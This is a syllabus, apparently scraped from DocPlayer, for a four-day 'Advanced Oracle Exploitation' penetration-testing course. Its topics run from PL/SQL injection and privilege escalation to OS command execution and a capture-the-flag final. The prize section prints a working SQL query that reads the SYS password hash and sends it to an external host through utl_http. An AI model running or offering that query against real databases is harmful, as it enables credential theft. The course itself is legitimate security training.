Penetration Testing: Advanced Oracle Exploitation Page 1



Similar documents
Database Assessment. Vulnerability Assessment Course

Pentesting / Hacking Oracle databases with

Top 10 Database. Misconfigurations.

ASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus

CYBERTRON NETWORK SOLUTIONS

An Introduction to SQL Injection Attacks for Oracle Developers. January 2004 INTEGRIGY. Mission Critical Applications Mission Critical Security

Advanced SQL Injection in Oracle databases. Esteban Martínez Fayó

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?

NEW AND IMPROVED: HACKING ORACLE FROM WEB. Sumit sid Siddharth 7Safe Limited UK

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Oracle Security Auditing

Oracle Security Auditing

Using Foundstone CookieDigger to Analyze Web Session Management

Thick Client Application Security

Making Database Security an IT Security Priority

Adobe Systems Incorporated

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

Safewhere*Identify 3.4. Release Notes

Oracle Database 11g: Security Release 2. Course Topics. Introduction to Database Security. Choosing Security Solutions

Oracle Database Vault: Design Failures

Need for Database Security. Whitepaper

National Endowment for the Arts Evaluation Report. Table of Contents. Results of Evaluation Areas for Improvement Exit Conference...

Columbia University Web Security Standards and Practices. Objective and Scope

Application Intrusion Detection

Improved Penetration Testing of Web Apps and Databases with MatriXay

ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION

Penetration Testing. Presented by

Learn Ethical Hacking, Become a Pentester

QuickBooks Online: Security & Infrastructure

SQL Injection January 23, 2013

ITEC441- IS Security. Chapter 15 Performing a Penetration Test

Different ways to guess Oracle database SID

Oracle Database 11g Security Essentials

Metasploit The Elixir of Network Security

Criteria for web application security check. Version

Penetration: from Application down to OS

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.

ETHICAL HACKING APPLICATIO WIRELESS110 00NETWORK APPLICATION MOBILE MOBILE0001

Securing Data on Microsoft SQL Server 2012

Webapps Vulnerability Report

Best Practices for Oracle Databases Hardening Oracle /

Web App Security Audit Services

Where every interaction matters.

SECURITY TRENDS & VULNERABILITIES REVIEW 2015

WHITE PAPER. An Introduction to SQL Injection Attacks for Oracle Developers

Expert Oracle Application. Express Security. Scott Spendolini. Apress"

Taxonomic Modeling of Security Threats in Software Defined Networking

Penetration Testing. Types Black Box. Methods Automated Manual Hybrid. oless productive, more difficult White Box

ASL IT Security Advanced Web Exploitation Kung Fu V2.0

External Network & Web Application Assessment. For The XXX Group LLC October 2012

Integrigy Corporate Overview

MS-55096: Securing Data on Microsoft SQL Server 2012

Chapter 1 Web Application (In)security 1

Security Vulnerability Notice

Oracle Database Security and Audit

Aiming at Higher Network Security Levels Through Extensive PENETRATION TESTING. Anestis Bechtsoudis. abechtsoudis (at) ieee.

Implementing Database Security and Auditing

defending against advanced persistent threats: strategies for a new era of attacks agility made possible

Redhawk Network Security, LLC Layton Ave., Suite One, Bend, OR

CS346: Database Programming.

Oracle Database Security. Nathan Aaron ICTN 4040 Spring 2006

(WAPT) Web Application Penetration Testing

Threat Modeling. Categorizing the nature and severity of system vulnerabilities. John B. Dickson, CISSP

Tableau Online Security in the Cloud

D50323GC20 Oracle Database 11g: Security Release 2

HUNTING ASYNCHRONOUS VULNERABILITIES. James Kettle

Information Security Services

Microsoft SQL Server Security Best Practices

Web Application Report

Hacking databases for owning your data. Cesar Cerrudo Esteban Martinez Fayo Argeniss (

Network Security Audit. Vulnerability Assessment (VA)

Pension Benefit Guaranty Corporation. Office of Inspector General. Evaluation Report. Penetration Testing An Update

OWASP AND APPLICATION SECURITY

Demystifying Penetration Testing for the Enterprise. Presented by Pravesh Gaonjur

Achieving Security Compliancy and Database Transparency Using Database Activity Monitoring Systems

Last update: February 23, 2004

Database Security Guide

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

The Nexpose Expert System

Advanced Web Security, Lab

Web Application Security

Database Security SQL Server 2012

Penetration Testing in Romania

Secure Web Application Coding Team Introductory Meeting December 1, :00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Potential Targets - Field Devices

Threat Modelling for Web Application Deployment. Ivan Ristic (Thinking Stone)

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Oracle Database 11g: Security Release 2

Oracle Database Security

PCI-DSS and Application Security Achieving PCI DSS Compliance with Seeker

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

Achieving Truly Secure Cloud Communications. How to navigate evolving security threats

Oracle Database Security

NNT CIS Microsoft SQL Server 2008R2 Database Engine Level 1 Benchmark Report 0514a

How To Classify A Dnet Attack

Transcription:

Penetration Testing: Advanced Oracle Exploitation Page 1

Course Index:: Day 1 Oracle RDBMS and the Oracle Network Architecture... 3» Introduction and Oracle Review...3» Service Information Enumeration:...3» First Avenues of Attack:...3 Day 1: Summary:... 3 Day 2 Attack Overview... 4» Auditing PLSQL Code...4» Attacking through PL/SQL...4» Real World Scenario: Exploiting DBMS_CDC_IMPDP...4 Day 2: Summary:... 4 Day 3 Attack Advancement... 5» Privilege Escalation...5» Advanced Techniques...5» Defeating Virtual Private Databases...5 Day 3: Summary:... 5 Day 4 Advanced Techniques... 6» Attacking PL/SQL Through WebAPPs...6» Running Operating System Commands...6» Using Oracle Network Capability...6 Day 4: Summary:... 6 FINAL ACTIVITY: ORALCLE SQL WARGAMES...7 Penetration Testing: Advanced Oracle Exploitation Page 2

Day 1 Oracle RDBMS and the Oracle Network Architecture» Introduction and Oracle Review Processes o Student will understand how oracle processes and permissions. The File System o Student will understand how oracle interacts with the filesystem. The Network o Student will learn about Oracles network capability from an infrastructural perspective.» Service Information Enumeration: The TNS Protocol Student will review the TNS protocol and how it is utilized by oracle. Enumerating Oracle Network Information Listener Version and Status Commands Using the TNS Protocol Version Using the XML Database Version Using Error Text Using the TTC Function» First Avenues of Attack: Attacking the TNS Listener and Dispatchers Aurora GOIP Server XML Database Attacking the Authentication Process Oracle Crypto Overview Default Login Values Account Enumeration and Brute Force Day 1: Summary: Day one starts off with a brief overview of the Oracle RDBMS and how it interacts with the operating system it resides on. Student will gain an overview of the process, file, and network capability built into oracle. Then the student will immediately be shown how to enumerate data about oracle version, and begin attacking a live oracle test-production server. Penetration Testing: Advanced Oracle Exploitation Page 3

Day 2 Attack Overview» Auditing PLSQL Code Dangerous Functionality, exploring PLSQL Syntax Understanding where PL/SQL lives in the Network Stack Examining Code for Interesting Problems» Attacking through PL/SQL Understanding PL/SQL Execution Privileges Oracle PL/SQL Wrapping PL/SQL Injection Flaw Reconnaissance API Hijacking in Relation to SQL Injection Race Conditions» Real World Scenario: Exploiting DBMS_CDC_IMPDP Understanding PL/SQL Execution Privileges Oracle PL/SQL Wrapping Direct PL/SQL Injection Example. Day 2: Summary: PL/SQL is a programming language for Oracle database servers. The PL in the acronym stands for Procedural Language, a fully featured programming language with built-in SQL capabilities and database objects such as packages, procedures, functions, triggers, and types - all written in PL/SQL. Because so many Oracle security issues relate in some way to PL/SQL, it is crucial for the Oracle security expert to understand PL/SQL. Day 2 explores PL/SQL in depth as a mechanism for attack against oracle servers. The student will explore injection theory and reconnaissance against SQL servers and how to inject into queries through process defenses. Additionally the student will learn to identify critical weak pots in the oracle PLSQL language, and will via a hands on scenario, be exploiting a DBMS_CDE_IMPDP exploitable scenario. Penetration Testing: Advanced Oracle Exploitation Page 4

Day 3 Attack Advancement» Privilege Escalation Student will earn to gain DBA Privileges Using o DBA from CREATE ANY Trigger o o DBA from CREATE ANY VIEW DBA from CREATE PROCEDURE» Advanced Techniques Exploiting Virtual Private Databases Oracle Confusion: Tricks to Access Policies» Defeating Virtual Private Databases Defeating VPDs using File Access Tricking Oracle into Dropping a Policy Exploiting General Privileges Day 3: Summary: A VPD is a security mechanism built into Oracle that allows fine-grained access control - or row-level security. There are a number of ways of defeating VPD. This day will start of with the student investigating some of these methods. The student will also be examining how some privileges can be abused to gain DBA privileges. Continuing from the last section, we'll look at the CREATE ANY TRIGGER privilege and how it can be used to elevate privileges. Additionally the student will be exposed to the dangers of many of the CREATE ANY privileges which typically can be leveraged to elevate an injection into DBA privileges. The student will additionally be exposed to the advanced methods used to gather policy information from the server utilizing custom exploitation methods. Penetration Testing: Advanced Oracle Exploitation Page 5

Day 4 Advanced Techniques» Attacking PL/SQL Through WebAPPs Recognizing the Oracle PL/SQL Gateway Verifying the Existance of the PL/SQL Gateway Attacking the Gateway» Running Operating System Commands Commands through Java Commands through the DBMS Scheduler Commands through the Job Scheduler Commands utilizing ALTER SYSTEM» Using Oracle Network Capability About UTL_TCP and UTL_HTTP Encrypting Data Prior to Extraction Attacking other Systems on the Network Java and the Network Database Links Day 4: Summary: The Oracle PL/SQL Gateway provides the capability to execute PL/SQL procedures in an Oracle database server via the web. It provides a gateway, a seamless path from the Internet, into a backend Oracle database server over the web. On Day 4 the user will be learning the attack methods used to exploit the PL/SQL gateway using cumulative learning from the previous 3 days, and newly introduced techniques. Additionally the student will be exposed to number of facilities for running operating system commands from the database server - some intentional and others "hacks." Commands can be executed in a variety of ways, by the end of the day the student will be able to attack and execute commands on the database with newly acquired techniques. The UTL_FILE package enables Oracle users to read and write to the file system. As already noted, access to files on the file system is achieved with the privileges of the Oracle user - so anything this user can read or write to can be read or written to by anyone else. Penetration Testing: Advanced Oracle Exploitation Page 6

FINAL ACTIVITY: ORALCLE SQL WARGAMES Student will use applied learning during this course to compete against other participants in a capture the flag tournament. Everyone gets the same image, the contest is to configure and secure your own image; and attack and take over the opponent host before the competition using the applied learning available in this course. Goal: Capture the most flags from network users and disable remote user retaliation. Pen-Test Winners Prize:» Grayscale Custom Oracle Hackers T-Shirt select utl_http.request('http://grayscale-research.org:8080 /' (SELECT PASSWORDFROM DBA_USERS WHERE USERNAME='SYS')) from dual;» Free 1 Year License for Grayscales Web-Auditors Toolkit Penetration Testing: Advanced Oracle Exploitation Page 7

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information